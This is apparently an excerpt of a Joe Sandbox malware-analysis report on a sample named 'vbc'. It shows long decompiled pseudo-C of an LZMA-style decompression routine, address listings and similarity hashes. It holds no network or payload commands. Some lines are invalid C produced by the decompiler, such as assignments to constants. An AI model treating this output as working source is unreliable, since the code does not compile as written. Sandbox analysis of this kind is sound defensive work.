                          													if(__eax == 0) {
                          														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          														goto L170;
                          													}
                          													__eflags = __eax -  *(__ebp - 0x60);
                          													if(__eax >  *(__ebp - 0x60)) {
                          														goto L171;
                          													}
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          													__eax =  *(__ebp - 0x30);
                          													_t400 = __ebp - 0x60;
                          													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          													__eflags =  *_t400;
                          													goto L123;
                          												}
                          												__ecx = __ebx;
                          												__eax = __ebx;
                          												__ecx = __ebx >> 1;
                          												__eax = __ebx & 0x00000001;
                          												__ecx = (__ebx >> 1) - 1;
                          												__al = __al | 0x00000002;
                          												__eax = (__ebx & 0x00000001) << __cl;
                          												__eflags = __ebx - 0xe;
                          												 *(__ebp - 0x2c) = __eax;
                          												if(__ebx >= 0xe) {
                          													__ebx = 0;
                          													 *(__ebp - 0x48) = __ecx;
                          													L102:
                          													__eflags =  *(__ebp - 0x48);
                          													if( *(__ebp - 0x48) <= 0) {
                          														__eax = __eax + __ebx;
                          														 *(__ebp - 0x40) = 4;
                          														 *(__ebp - 0x2c) = __eax;
                          														__eax =  *(__ebp - 4);
                          														__eax =  *(__ebp - 4) + 0x644;
                          														__eflags = __eax;
                          														L108:
                          														__ebx = 0;
                          														 *(__ebp - 0x58) = __eax;
                          														 *(__ebp - 0x50) = 1;
                          														 *(__ebp - 0x44) = 0;
                          														 *(__ebp - 0x48) = 0;
                          														L112:
                          														__eax =  *(__ebp - 0x40);
                          														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          															_t391 = __ebp - 0x2c;
                          															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          															__eflags =  *_t391;
                          															goto L119;
                          														}
                          														__eax =  *(__ebp - 0x50);
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          														__eax =  *(__ebp - 0x58);
                          														__esi = __edi + __eax;
                          														 *(__ebp - 0x54) = __esi;
                          														__ax =  *__esi;
                          														__ecx = __ax & 0x0000ffff;
                          														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          														__eflags =  *(__ebp - 0xc) - __edx;
                          														if( *(__ebp - 0xc) >= __edx) {
                          															__ecx = 0;
                          															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          															__ecx = 1;
                          															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          															__ebx = 1;
                          															__ecx =  *(__ebp - 0x48);
                          															__ebx = 1 << __cl;
                          															__ecx = 1 << __cl;
                          															__ebx =  *(__ebp - 0x44);
                          															__ebx =  *(__ebp - 0x44) | __ecx;
                          															__cx = __ax;
                          															__cx = __ax >> 5;
                          															__eax = __eax - __ecx;
                          															__edi = __edi + 1;
                          															__eflags = __edi;
                          															 *(__ebp - 0x44) = __ebx;
                          															 *__esi = __ax;
                          															 *(__ebp - 0x50) = __edi;
                          														} else {
                          															 *(__ebp - 0x10) = __edx;
                          															0x800 = 0x800 - __ecx;
                          															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          															 *__esi = __dx;
                          														}
                          														__eflags =  *(__ebp - 0x10) - 0x1000000;
                          														if( *(__ebp - 0x10) >= 0x1000000) {
                          															L111:
                          															_t368 = __ebp - 0x48;
                          															 *_t368 =  *(__ebp - 0x48) + 1;
                          															__eflags =  *_t368;
                          															goto L112;
                          														} else {
                          															goto L109;
                          														}
                          													}
                          													__ecx =  *(__ebp - 0xc);
                          													__ebx = __ebx + __ebx;
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													 *(__ebp - 0x44) = __ebx;
                          													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          														__ecx =  *(__ebp - 0x10);
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          														__ebx = __ebx | 0x00000001;
                          														__eflags = __ebx;
                          														 *(__ebp - 0x44) = __ebx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L101:
                          														_t338 = __ebp - 0x48;
                          														 *_t338 =  *(__ebp - 0x48) - 1;
                          														__eflags =  *_t338;
                          														goto L102;
                          													} else {
                          														goto L99;
                          													}
                          												}
                          												__edx =  *(__ebp - 4);
                          												__eax = __eax - __ebx;
                          												 *(__ebp - 0x40) = __ecx;
                          												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          												goto L108;
                          											case 0x1a:
                          												L56:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													 *(__ebp - 0x88) = 0x1a;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x68);
                          												__al =  *(__ebp - 0x5c);
                          												__edx =  *(__ebp - 8);
                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *( *(__ebp - 0x68)) = __al;
                          												__ecx =  *(__ebp - 0x14);
                          												 *(__ecx +  *(__ebp - 8)) = __al;
                          												__eax = __ecx + 1;
                          												__edx = 0;
                          												_t192 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t192;
                          												goto L79;
                          											case 0x1b:
                          												L75:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													 *(__ebp - 0x88) = 0x1b;
                          													goto L170;
                          												}
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t274 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t274;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												_t283 = __ebp - 0x64;
                          												 *_t283 =  *(__ebp - 0x64) - 1;
                          												__eflags =  *_t283;
                          												 *( *(__ebp - 0x68)) = __cl;
                          												L79:
                          												 *(__ebp - 0x14) = __edx;
                          												goto L80;
                          											case 0x1c:
                          												while(1) {
                          													L123:
                          													__eflags =  *(__ebp - 0x64);
                          													if( *(__ebp - 0x64) == 0) {
                          														break;
                          													}
                          													__eax =  *(__ebp - 0x14);
                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          													__eflags = __eax -  *(__ebp - 0x74);
                          													if(__eax >=  *(__ebp - 0x74)) {
                          														__eax = __eax +  *(__ebp - 0x74);
                          														__eflags = __eax;
                          													}
                          													__edx =  *(__ebp - 8);
                          													__cl =  *(__eax + __edx);
                          													__eax =  *(__ebp - 0x14);
                          													 *(__ebp - 0x5c) = __cl;
                          													 *(__eax + __edx) = __cl;
                          													__eax = __eax + 1;
                          													__edx = 0;
                          													_t414 = __eax %  *(__ebp - 0x74);
                          													__eax = __eax /  *(__ebp - 0x74);
                          													__edx = _t414;
                          													__eax =  *(__ebp - 0x68);
                          													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          													__eflags =  *(__ebp - 0x30);
                          													 *( *(__ebp - 0x68)) = __cl;
                          													 *(__ebp - 0x14) = _t414;
                          													if( *(__ebp - 0x30) > 0) {
                          														continue;
                          													} else {
                          														L80:
                          														 *(__ebp - 0x88) = 2;
                          														goto L1;
                          													}
                          												}
                          												 *(__ebp - 0x88) = 0x1c;
                          												goto L170;
                          										}
                          									}
                          									L171:
                          									_t544 = _t543 | 0xffffffff;
                          									goto L172;
                          								}
                          							}
                          						}
                          					}
                          					goto L1;
                          				}
                          			}














                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004066bb
                          0x004066b8
                          0x00000000
                          0x004062ef

                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                          • Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
                          • Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                          • Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00406409() {
                          				unsigned short _t531;
                          				signed int _t532;
                          				void _t533;
                          				signed int _t534;
                          				signed int _t535;
                          				signed int _t565;
                          				signed int _t568;
                          				signed int _t589;
                          				signed int* _t606;
                          				void* _t613;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t613 - 0x40) != 0) {
                          						 *(_t613 - 0x84) = 0xb;
                          						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                          						goto L132;
                          					} else {
                          						__eax =  *(__ebp - 0x28);
                          						L88:
                          						 *(__ebp - 0x2c) = __eax;
                          						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          						L89:
                          						__eax =  *(__ebp - 4);
                          						 *(__ebp - 0x80) = 0x15;
                          						__eax =  *(__ebp - 4) + 0xa68;
                          						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          						L69:
                          						 *(__ebp - 0x84) = 0x12;
                          						while(1) {
                          							L132:
                          							 *(_t613 - 0x54) = _t606;
                          							while(1) {
                          								L133:
                          								_t531 =  *_t606;
                          								_t589 = _t531 & 0x0000ffff;
                          								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          								if( *(_t613 - 0xc) >= _t565) {
                          									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          									 *(_t613 - 0x40) = 1;
                          									_t532 = _t531 - (_t531 >> 5);
                          									 *_t606 = _t532;
                          								} else {
                          									 *(_t613 - 0x10) = _t565;
                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                          								}
                          								if( *(_t613 - 0x10) >= 0x1000000) {
                          									goto L139;
                          								}
                          								L137:
                          								if( *(_t613 - 0x6c) == 0) {
                          									 *(_t613 - 0x88) = 5;
                          									L170:
                          									_t568 = 0x22;
                          									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                          									_t535 = 0;
                          									L172:
                          									return _t535;
                          								}
                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                          								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          								L139:
                          								_t533 =  *(_t613 - 0x84);
                          								while(1) {
                          									 *(_t613 - 0x88) = _t533;
                          									while(1) {
                          										L1:
                          										_t534 =  *(_t613 - 0x88);
                          										if(_t534 > 0x1c) {
                          											break;
                          										}
                          										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                          											case 0:
                          												if( *(_t613 - 0x6c) == 0) {
                          													goto L170;
                          												}
                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          												_t534 =  *( *(_t613 - 0x70));
                          												if(_t534 > 0xe1) {
                          													goto L171;
                          												}
                          												_t538 = _t534 & 0x000000ff;
                          												_push(0x2d);
                          												asm("cdq");
                          												_pop(_t570);
                          												_push(9);
                          												_pop(_t571);
                          												_t609 = _t538 / _t570;
                          												_t540 = _t538 % _t570 & 0x000000ff;
                          												asm("cdq");
                          												_t604 = _t540 % _t571 & 0x000000ff;
                          												 *(_t613 - 0x3c) = _t604;
                          												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                          												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                          												_t612 = (0x300 << _t604 + _t609) + 0x736;
                          												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                          													L10:
                          													if(_t612 == 0) {
                          														L12:
                          														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                          														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          														goto L15;
                          													} else {
                          														goto L11;
                          													}
                          													do {
                          														L11:
                          														_t612 = _t612 - 1;
                          														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                          													} while (_t612 != 0);
                          													goto L12;
                          												}
                          												if( *(_t613 - 4) != 0) {
                          													GlobalFree( *(_t613 - 4));
                          												}
                          												_t534 = GlobalAlloc(0x40, 0x600); // executed
                          												 *(_t613 - 4) = _t534;
                          												if(_t534 == 0) {
                          													goto L171;
                          												} else {
                          													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                          													goto L10;
                          												}
                          											case 1:
                          												L13:
                          												__eflags =  *(_t613 - 0x6c);
                          												if( *(_t613 - 0x6c) == 0) {
                          													 *(_t613 - 0x88) = 1;
                          													goto L170;
                          												}
                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          												_t45 = _t613 - 0x48;
                          												 *_t45 =  *(_t613 - 0x48) + 1;
                          												__eflags =  *_t45;
                          												L15:
                          												if( *(_t613 - 0x48) < 4) {
                          													goto L13;
                          												}
                          												_t546 =  *(_t613 - 0x40);
                          												if(_t546 ==  *(_t613 - 0x74)) {
                          													L20:
                          													 *(_t613 - 0x48) = 5;
                          													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                          													goto L23;
                          												}
                          												 *(_t613 - 0x74) = _t546;
                          												if( *(_t613 - 8) != 0) {
                          													GlobalFree( *(_t613 - 8));
                          												}
                          												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                          												 *(_t613 - 8) = _t534;
                          												if(_t534 == 0) {
                          													goto L171;
                          												} else {
                          													goto L20;
                          												}
                          											case 2:
                          												L24:
                          												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                          												 *(_t613 - 0x84) = 6;
                          												 *(_t613 - 0x4c) = _t553;
                          												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                          												L132:
                          												 *(_t613 - 0x54) = _t606;
                          												goto L133;
                          											case 3:
                          												L21:
                          												__eflags =  *(_t613 - 0x6c);
                          												if( *(_t613 - 0x6c) == 0) {
                          													 *(_t613 - 0x88) = 3;
                          													goto L170;
                          												}
                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          												_t67 = _t613 - 0x70;
                          												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                          												__eflags =  *_t67;
                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          												L23:
                          												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                          												if( *(_t613 - 0x48) != 0) {
                          													goto L21;
                          												}
                          												goto L24;
                          											case 4:
                          												L133:
                          												_t531 =  *_t606;
                          												_t589 = _t531 & 0x0000ffff;
                          												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          												if( *(_t613 - 0xc) >= _t565) {
                          													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          													 *(_t613 - 0x40) = 1;
                          													_t532 = _t531 - (_t531 >> 5);
                          													 *_t606 = _t532;
                          												} else {
                          													 *(_t613 - 0x10) = _t565;
                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                          												}
                          												if( *(_t613 - 0x10) >= 0x1000000) {
                          													goto L139;
                          												}
                          											case 5:
                          												goto L137;
                          											case 6:
                          												__edx = 0;
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x34) = 1;
                          													 *(__ebp - 0x84) = 7;
                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          													while(1) {
                          														L132:
                          														 *(_t613 - 0x54) = _t606;
                          														goto L133;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          												__esi =  *(__ebp - 0x60);
                          												__cl = 8;
                          												__cl = 8 -  *(__ebp - 0x3c);
                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          												__ecx =  *(__ebp - 0x3c);
                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          												__ecx =  *(__ebp - 4);
                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          												__eflags =  *(__ebp - 0x38) - 4;
                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          												if( *(__ebp - 0x38) >= 4) {
                          													__eflags =  *(__ebp - 0x38) - 0xa;
                          													if( *(__ebp - 0x38) >= 0xa) {
                          														_t98 = __ebp - 0x38;
                          														 *_t98 =  *(__ebp - 0x38) - 6;
                          														__eflags =  *_t98;
                          													} else {
                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          													}
                          												} else {
                          													 *(__ebp - 0x38) = 0;
                          												}
                          												__eflags =  *(__ebp - 0x34) - __edx;
                          												if( *(__ebp - 0x34) == __edx) {
                          													__ebx = 0;
                          													__ebx = 1;
                          													goto L61;
                          												} else {
                          													__eax =  *(__ebp - 0x14);
                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          													__eflags = __eax -  *(__ebp - 0x74);
                          													if(__eax >=  *(__ebp - 0x74)) {
                          														__eax = __eax +  *(__ebp - 0x74);
                          														__eflags = __eax;
                          													}
                          													__ecx =  *(__ebp - 8);
                          													__ebx = 0;
                          													__ebx = 1;
                          													__al =  *((intOrPtr*)(__eax + __ecx));
                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          													goto L41;
                          												}
                          											case 7:
                          												__eflags =  *(__ebp - 0x40) - 1;
                          												if( *(__ebp - 0x40) != 1) {
                          													__eax =  *(__ebp - 0x24);
                          													 *(__ebp - 0x80) = 0x16;
                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          													__eax =  *(__ebp - 0x28);
                          													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          													__eax =  *(__ebp - 0x2c);
                          													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          													__eax = 0;
                          													__eflags =  *(__ebp - 0x38) - 7;
                          													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          													__al = __al & 0x000000fd;
                          													__eax = (__eflags >= 0) - 1 + 0xa;
                          													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          													__eax =  *(__ebp - 4);
                          													__eax =  *(__ebp - 4) + 0x664;
                          													__eflags = __eax;
                          													 *(__ebp - 0x58) = __eax;
                          													goto L69;
                          												}
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 8;
                          												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          												while(1) {
                          													L132:
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											case 8:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x84) = 0xa;
                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          												} else {
                          													__eax =  *(__ebp - 0x38);
                          													__ecx =  *(__ebp - 4);
                          													__eax =  *(__ebp - 0x38) + 0xf;
                          													 *(__ebp - 0x84) = 9;
                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          												}
                          												while(1) {
                          													L132:
                          													 *(_t613 - 0x54) = _t606;
                          													goto L133;
                          												}
                          											case 9:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													goto L89;
                          												}
                          												__eflags =  *(__ebp - 0x60);
                          												if( *(__ebp - 0x60) == 0) {
                          													goto L171;
                          												}
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                          												__eflags = _t259;
                          												0 | _t259 = _t259 + _t259 + 9;
                          												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                          												goto L76;
                          											case 0xa:
                          												goto L0;
                          											case 0xb:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__ecx =  *(__ebp - 0x24);
                          													__eax =  *(__ebp - 0x20);
                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												} else {
                          													__eax =  *(__ebp - 0x24);
                          												}
                          												__ecx =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												goto L88;
                          											case 0xc:
                          												L99:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xc;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t334 = __ebp - 0x70;
                          												 *_t334 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t334;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												__eax =  *(__ebp - 0x2c);
                          												goto L101;
                          											case 0xd:
                          												L37:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xd;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t122 = __ebp - 0x70;
                          												 *_t122 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t122;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L39:
                          												__eax =  *(__ebp - 0x40);
                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          													goto L48;
                          												}
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													goto L54;
                          												}
                          												L41:
                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          												__ecx =  *(__ebp - 0x58);
                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          												 *(__ebp - 0x48) = __eax;
                          												__eax = __eax + 1;
                          												__eax = __eax << 8;
                          												__eax = __eax + __ebx;
                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edx = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
